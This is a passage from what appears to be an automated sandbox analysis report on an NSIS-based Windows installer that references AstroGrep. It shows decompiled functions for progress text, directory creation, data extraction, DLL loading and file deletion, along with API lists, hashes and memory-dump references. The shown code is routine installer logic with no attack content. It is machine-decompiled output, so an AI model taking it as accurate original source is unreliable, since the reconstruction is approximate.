                                                                                                              • Part of subcall function 00404F48: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,00402FFA,00402FFA,Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,00000000,0075D8B4,74B5EA30), ref: 00404FA4
                                                                                                              • Part of subcall function 00404F48: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\), ref: 00404FB6
                                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                            • String ID: C:\Program Files (x86)\AstroGrep$C:\Users\user\AppData\Local\Temp\nsq211B.tmp$C:\Users\user\AppData\Local\Temp\nsq211B.tmp\System.dll$Call
                                                                                                            • API String ID: 1941528284-2150090298
                                                                                                            • Opcode ID: 1ad589e704bad48cb4130d124ba426fde029c0c3fa9ab524d7428522585685e4
                                                                                                            • Instruction ID: 9fffb686f64fba45267de9fcbed8a5438fb589d34f2a074259106400a528bed4
                                                                                                            • Opcode Fuzzy Hash: 1ad589e704bad48cb4130d124ba426fde029c0c3fa9ab524d7428522585685e4
                                                                                                            • Instruction Fuzzy Hash: 1041B831900519BBDF107BA5DC85EAF3679DF45368B60863BF121F11E1D63C8A418A6D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00404F48, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00404F48(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42dbe4; // 0x40266
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42e4b4;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405D51(0, _t39, 0x429048, 0x429048, _a4);
					}
					_t26 = lstrlenA(0x429048);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42dbc8, 0x429048); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x429048;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52); // executed
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x429048)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x429048, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                                                                            0x00404f4e
                                                                                                            0x00404f5a
                                                                                                            0x00404f5d
                                                                                                            0x00404f63
                                                                                                            0x00404f6f
                                                                                                            0x00404f72
                                                                                                            0x00404f75
                                                                                                            0x00404f7b
                                                                                                            0x00404f7b
                                                                                                            0x00404f81
                                                                                                            0x00404f89
                                                                                                            0x00404f8c
                                                                                                            0x00404fa9
                                                                                                            0x00404fad
                                                                                                            0x00404fb6
                                                                                                            0x00404fb6
                                                                                                            0x00404fc0
                                                                                                            0x00404fc9
                                                                                                            0x00404fd5
                                                                                                            0x00404fdc
                                                                                                            0x00404fe0
                                                                                                            0x00404fe3
                                                                                                            0x00404ff6
                                                                                                            0x00405004
                                                                                                            0x00405004
                                                                                                            0x00405008
                                                                                                            0x0040500a
                                                                                                            0x0040500d
                                                                                                            0x00000000
                                                                                                            0x0040500d
                                                                                                            0x00404f8e
                                                                                                            0x00404f96
                                                                                                            0x00404f9e
                                                                                                            0x00404fa4
                                                                                                            0x00000000
                                                                                                            0x00404fa4
                                                                                                            0x00404f9e
                                                                                                            0x00404f8c
                                                                                                            0x00405017

                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,00000000,0075D8B4,74B5EA30,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                                            • lstrlenA.KERNEL32(00402FFA,Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,00000000,0075D8B4,74B5EA30,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                                            • lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,00402FFA,00402FFA,Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,00000000,0075D8B4,74B5EA30), ref: 00404FA4
                                                                                                            • SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\), ref: 00404FB6
                                                                                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                                            • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                                            • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                            • String ID: Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\
                                                                                                            • API String ID: 2531174081-1207206035
                                                                                                            • Opcode ID: 534154c7e412c88fb75b9fbb21228ed2bc61e9f55108b0b726938b2d4222e579
                                                                                                            • Instruction ID: 5247e829223e414f07dbea0a4ec6ac131d28d962b221907bbf4360a320382309
                                                                                                            • Opcode Fuzzy Hash: 534154c7e412c88fb75b9fbb21228ed2bc61e9f55108b0b726938b2d4222e579
                                                                                                            • Instruction Fuzzy Hash: 76218C71D00118BBDF219FA5DC84ADEBFA9EF08354F10807AF904B6291C7798E408FA8
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0040540E, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0040540E(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x407374;
				_v36.Group = 0x407374;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x407364;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                                                                            0x00405419
                                                                                                            0x0040541d
                                                                                                            0x00405420
                                                                                                            0x00405426
                                                                                                            0x0040542a
                                                                                                            0x0040542e
                                                                                                            0x00405436
                                                                                                            0x0040543d
                                                                                                            0x00405443
                                                                                                            0x0040544a
                                                                                                            0x00405451
                                                                                                            0x00405459
                                                                                                            0x0040545b
                                                                                                            0x00000000
                                                                                                            0x0040545b
                                                                                                            0x00405465
                                                                                                            0x0040546c
                                                                                                            0x00405482
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405484
                                                                                                            0x00405488

                                                                                                            APIs
                                                                                                            • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405451
                                                                                                            • GetLastError.KERNEL32 ref: 00405465
                                                                                                            • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040547A
                                                                                                            • GetLastError.KERNEL32 ref: 00405484
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$ds@$ts@
                                                                                                            • API String ID: 3449924974-816313341
                                                                                                            • Opcode ID: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                                                                            • Instruction ID: 7d6f839e8d8492d35463ff02b487d6c5a8d89e3dbffb35ab490880a12e6152a5
                                                                                                            • Opcode Fuzzy Hash: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                                                                            • Instruction Fuzzy Hash: B4010871D14259EADF11DBA0C9447EFBFB8EB14355F004176E905B6280E378A644CFAA
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00402E9F, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 166COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 95%
                                                                                                            			E00402E9F(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				char _v88;
				void* _t65;
				void* _t69;
				long _t70;
				intOrPtr _t75;
				long _t76;
				intOrPtr _t77;
				void* _t78;
				int _t88;
				intOrPtr _t92;
				intOrPtr _t95;
				long _t96;
				signed int _t97;
				int _t98;
				int _t99;
				intOrPtr _t100;
				void* _t101;
				void* _t102;

				_t97 = _a16;
				_t92 = _a12;
				_v12 = _t97;
				if(_t92 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t92;
				if(_t92 == 0) {
					_v16 = 0x418420;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E004030C7( *0x42e458 + _t62);
				}
				if(E004030B1( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t92 != 0) {
							if(_a16 < _t97) {
								_t97 = _a16;
							}
							if(E004030B1(_t92, _t97) != 0) {
								_v8 = _t97;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t92) {
							goto L44;
						}
						_t88 = _v12;
						while(1) {
							_t98 = _a16;
							if(_a16 >= _t88) {
								_t98 = _t88;
							}
							if(E004030B1(0x414420, _t98) == 0) {
								goto L41;
							}
							_t69 = E00405A49(_a8, 0x414420, _t98); // executed
							if(_t69 == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t98;
							_a16 = _a16 - _t98;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40ad84 =  *0x40ad84 & 0x00000000;
					 *0x40ad80 =  *0x40ad80 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40a868 = 8;
					 *0x414410 = 0x40c408;
					 *0x41440c = 0x40c408;
					 *0x414408 = 0x414408;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E004030B1(0x414420, _t99) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t99;
						 *0x40a858 = 0x414420;
						 *0x40a85c = _t99;
						while(1) {
							_t95 = _v16;
							 *0x40a860 = _t95;
							 *0x40a864 = _v12;
							_t75 = E004061AB(0x40a858);
							_v24 = _t75;
							if(_t75 < 0) {
								break;
							}
							_t100 =  *0x40a860; // 0x75d8b4
							_t101 = _t100 - _t95;
							_t76 = GetTickCount();
							_t96 = _t76;
							if(( *0x42e4b4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E00404F48(0,  &_v88); // executed
								_v20 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t77 =  *0x40a860; // 0x75d8b4
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_v16 = _t77;
									L23:
									if(_v24 != 1) {
										continue;
									}
									goto L44;
								}
								_t78 = E00405A49(_a8, _v16, _t101); // executed
								if(_t78 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t101;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}


























                                                                                                            0x00402ea7
                                                                                                            0x00402eab
                                                                                                            0x00402eae
                                                                                                            0x00402eb3
                                                                                                            0x00402eb5
                                                                                                            0x00402eb5
                                                                                                            0x00402ebc
                                                                                                            0x00402ec0
                                                                                                            0x00402ec5
                                                                                                            0x00402ec7
                                                                                                            0x00402ec7
                                                                                                            0x00402ece
                                                                                                            0x00402ed3
                                                                                                            0x00402ede
                                                                                                            0x00402ede
                                                                                                            0x00402ef0
                                                                                                            0x0040309f
                                                                                                            0x0040309f
                                                                                                            0x00000000
                                                                                                            0x00402ef6
                                                                                                            0x00402efa
                                                                                                            0x0040304c
                                                                                                            0x0040308f
                                                                                                            0x00403091
                                                                                                            0x00403091
                                                                                                            0x0040309d
                                                                                                            0x004030a4
                                                                                                            0x004030a7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040309d
                                                                                                            0x00403051
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403053
                                                                                                            0x00403056
                                                                                                            0x00403059
                                                                                                            0x0040305c
                                                                                                            0x0040305e
                                                                                                            0x0040305e
                                                                                                            0x0040306e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403075
                                                                                                            0x0040307c
                                                                                                            0x00403046
                                                                                                            0x00403046
                                                                                                            0x004030a1
                                                                                                            0x004030a1
                                                                                                            0x00000000
                                                                                                            0x004030a1
                                                                                                            0x0040307e
                                                                                                            0x00403081
                                                                                                            0x00403088
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040308a
                                                                                                            0x00000000
                                                                                                            0x00403056
                                                                                                            0x00402f06
                                                                                                            0x00402f08
                                                                                                            0x00402f0f
                                                                                                            0x00402f16
                                                                                                            0x00402f16
                                                                                                            0x00402f1d
                                                                                                            0x00402f25
                                                                                                            0x00402f2f
                                                                                                            0x00402f34
                                                                                                            0x00402f3c
                                                                                                            0x00402f46
                                                                                                            0x00402f49
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00402f4f
                                                                                                            0x00402f4f
                                                                                                            0x00402f4f
                                                                                                            0x00402f57
                                                                                                            0x00402f59
                                                                                                            0x00402f59
                                                                                                            0x00402f6a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00402f70
                                                                                                            0x00402f73
                                                                                                            0x00402f79
                                                                                                            0x00402f7f
                                                                                                            0x00402f7f
                                                                                                            0x00402f8a
                                                                                                            0x00402f90
                                                                                                            0x00402f95
                                                                                                            0x00402f9c
                                                                                                            0x00402f9f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00402fa5
                                                                                                            0x00402fab
                                                                                                            0x00402fad
                                                                                                            0x00402fb6
                                                                                                            0x00402fb8
                                                                                                            0x00402fe6
                                                                                                            0x00402fec
                                                                                                            0x00402ff5
                                                                                                            0x00402ffa
                                                                                                            0x00402ffa
                                                                                                            0x00402fff
                                                                                                            0x0040303a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403001
                                                                                                            0x00403005
                                                                                                            0x0040301c
                                                                                                            0x00403021
                                                                                                            0x00403024
                                                                                                            0x00403027
                                                                                                            0x0040302a
                                                                                                            0x0040302e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403034
                                                                                                            0x0040300e
                                                                                                            0x00403015
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403017
                                                                                                            0x00000000
                                                                                                            0x00403017
                                                                                                            0x00402fff
                                                                                                            0x00403042
                                                                                                            0x00000000
                                                                                                            0x00403042
                                                                                                            0x00000000
                                                                                                            0x00402f4f

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: CountTick$wsprintf
                                                                                                            • String ID: DA$ DA$... %d%%
                                                                                                            • API String ID: 551687249-812340929
                                                                                                            • Opcode ID: 3db6f8c6f652b1c77dd2c917078849ed77b49c7e940390d82110b7debcd341ac
                                                                                                            • Instruction ID: 91ee06cea14faca46f7a5a314d1b96781db6e884ff6161e1c143c8ea96f9570f
                                                                                                            • Opcode Fuzzy Hash: 3db6f8c6f652b1c77dd2c917078849ed77b49c7e940390d82110b7debcd341ac
                                                                                                            • Instruction Fuzzy Hash: FB51907190120A9BDB10DF65EA44B9F7BB8EF44756F10813BE800B72C4D7788E51DBAA
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0040605A, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0040605A(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x409014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








                                                                                                            0x00406071
                                                                                                            0x0040607a
                                                                                                            0x0040607c
                                                                                                            0x0040607c
                                                                                                            0x00406080
                                                                                                            0x00406092
                                                                                                            0x0040608c
                                                                                                            0x0040608c
                                                                                                            0x0040608c
                                                                                                            0x00406096
                                                                                                            0x004060aa
                                                                                                            0x004060be
                                                                                                            0x004060c5

                                                                                                            APIs
                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 00406071
                                                                                                            • wsprintfA.USER32 ref: 004060AA
                                                                                                            • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060BE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                            • String ID: %s%s.dll$UXTHEME$\
                                                                                                            • API String ID: 2200240437-4240819195
                                                                                                            • Opcode ID: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                                                            • Instruction ID: e3f146f71c0a6e9640e358317deb724d3a5625ccb5f8d81b259ee964bec3998a
                                                                                                            • Opcode Fuzzy Hash: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                                                                                            • Instruction Fuzzy Hash: D0F0FC3095010566DB14DB74DD0DFEB375CAB08305F14017AA647E11D1D974F9248B69
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004026C6, Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 86%
                                                                                                            			E004026C6(int __ebx) {
				void* _t26;
				long _t31;
				intOrPtr _t39;
				int _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
				_t50 = E00402A3A(0xfffffff0);
				 *(_t56 - 0x38) = _t23;
				if(E0040580E(_t50) == 0) {
					E00402A3A(0xffffffed);
				}
				E0040597D(_t50);
				_t26 = E004059A2(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x42e414;
					 *(_t56 - 0x30) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E004030C7(_t45);
						E004030B1(_t49,  *(_t56 - 0x30));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x34) = _t54;
						if(_t54 != _t45) {
							E00402E9F( *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20)); // executed
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x50) =  *_t54;
								E0040595D( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x50);
							}
							GlobalFree( *(_t56 - 0x34));
						}
						E00405A49( *(_t56 + 8), _t49,  *(_t56 - 0x30)); // executed
						GlobalFree(_t49); // executed
						_t39 = E00402E9F(0xffffffff,  *(_t56 + 8), _t45, _t45); // executed
						 *((intOrPtr*)(_t56 - 0xc)) = _t39;
					}
					FindCloseChangeNotification( *(_t56 + 8)); // executed
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileA( *(_t56 - 0x38));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x42e488 =  *0x42e488 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}












                                                                                                            0x004026c6
                                                                                                            0x004026c8
                                                                                                            0x004026d4
                                                                                                            0x004026d7
                                                                                                            0x004026e1
                                                                                                            0x004026e5
                                                                                                            0x004026e5
                                                                                                            0x004026eb
                                                                                                            0x004026f8
                                                                                                            0x00402700
                                                                                                            0x00402703
                                                                                                            0x00402709
                                                                                                            0x00402717
                                                                                                            0x0040271c
                                                                                                            0x00402720
                                                                                                            0x00402723
                                                                                                            0x0040272c
                                                                                                            0x00402738
                                                                                                            0x0040273c
                                                                                                            0x0040273f
                                                                                                            0x00402749
                                                                                                            0x00402768
                                                                                                            0x00402750
                                                                                                            0x00402755
                                                                                                            0x0040275d
                                                                                                            0x00402760
                                                                                                            0x00402765
                                                                                                            0x00402765
                                                                                                            0x0040276f
                                                                                                            0x0040276f
                                                                                                            0x0040277c
                                                                                                            0x00402782
                                                                                                            0x0040278f
                                                                                                            0x00402794
                                                                                                            0x00402794
                                                                                                            0x0040279a
                                                                                                            0x0040279a
                                                                                                            0x004027a5
                                                                                                            0x004027a6
                                                                                                            0x004027aa
                                                                                                            0x004027ae
                                                                                                            0x004027b4
                                                                                                            0x004027b4
                                                                                                            0x004027bb
                                                                                                            0x004021c4
                                                                                                            0x004028d2
                                                                                                            0x004028de

                                                                                                            APIs
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
                                                                                                            • GlobalFree.KERNEL32 ref: 0040276F
                                                                                                            • GlobalFree.KERNEL32 ref: 00402782
                                                                                                            • FindCloseChangeNotification.KERNELBASE(?,?,?,?,000000F0), ref: 0040279A
                                                                                                            • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Global$AllocFree$ChangeCloseDeleteFileFindNotification
                                                                                                            • String ID:
                                                                                                            • API String ID: 2989416154-0
                                                                                                            • Opcode ID: fc843bc57811b3c266407200668139bacaf742fdca07d4dd84a32fe73dd5847c
                                                                                                            • Instruction ID: 5d6717e5ef000630179c441ec4dabf90fe6e4dbd5b0bc7dedcefa97c90ee8361
                                                                                                            • Opcode Fuzzy Hash: fc843bc57811b3c266407200668139bacaf742fdca07d4dd84a32fe73dd5847c
                                                                                                            • Instruction Fuzzy Hash: 1D215E71800124BBCF216FA5CE49EAE7E79EF09324F14423AF910762D1D7795D418FA9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00404709, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 78%
                                                                                                            			E00404709(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				int _t35;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

